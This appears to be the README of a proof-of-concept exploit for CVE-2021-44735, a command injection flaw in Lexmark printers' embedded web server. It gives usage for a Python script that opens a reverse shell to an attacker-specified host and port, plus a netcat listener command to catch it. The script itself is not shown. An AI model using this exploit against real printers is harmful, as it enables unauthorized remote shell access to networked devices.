## https://sploitus.com/exploit?id=7EC56C89-5D3E-5027-81AD-DDFAFC8B5606
# CVE-2021-44735 PoC
Embedded web server command injection vulnerability in Lexmark devices.
The exploit is based on the following research: https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/
## Usage
To run the exploit, pass 3 arguments:
- rhost - IP address of the printer
- lhost - IP address of the interface for the reverse-shell connection
- lport - port number for the reverse-shell connection
```
python3 cve-2021-44735.py -r <rhost> -l <lhost> -p <lport>
```
![](./exploitation_example.png)
To receive the reverse-shell connection, start a listener on the specified lhost and lport, for example using `netcat`:
```
nc -nvlp 80
```
![](./exploitation_result.png)